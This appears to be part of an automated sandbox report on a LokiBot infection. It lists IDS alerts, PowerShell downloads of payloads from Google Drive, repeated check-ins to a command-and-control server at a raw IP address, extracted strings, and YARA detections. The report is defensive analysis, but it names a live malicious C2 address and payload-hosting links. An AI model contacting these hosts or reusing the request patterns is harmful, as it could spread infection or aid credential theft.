                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49730 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Joe Sandbox ViewIP Address: 137.184.191.215 137.184.191.215
                Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49713 -> 142.250.184.238:443
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 153Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: unknownHTTP traffic detected: POST /index.php/check.php?id=1 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C7D7BA0Content-Length: 180Connection: close
                Source: dxdiag.exe, dxdiag.exe, 00000012.00000003.2523458523.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/check.php?id=1
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3013276125.0000000004B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBsq
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428D44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428D44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3286061335.0000000006180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8P
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8XR
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh8
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: dxdiag.exe, dxdiag.exe, 00000012.00000003.2523490234.0000000005F9D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2459489628.0000000005F9D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2459437875.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2523458523.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F63000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                Source: dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=download
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1X9VWjBBE8e_2wKjkMjTUVDuC1CN1AV1I&export=downloadM
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1exFxLo5Dn87FWQsKOF9GF6Rf-pHgXqJ8&export=download
                Source: powershell.exe, 00000004.00000002.3013276125.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2211216350.000002B427C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3026899970.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: dxdiag.exe, 00000012.00000002.3285682620.0000000005F36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000002.00000002.2211216350.000002B428E1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B427501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211216350.000002B428E16000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000003.2422518928.0000000005F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49714 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_6412.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3032, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
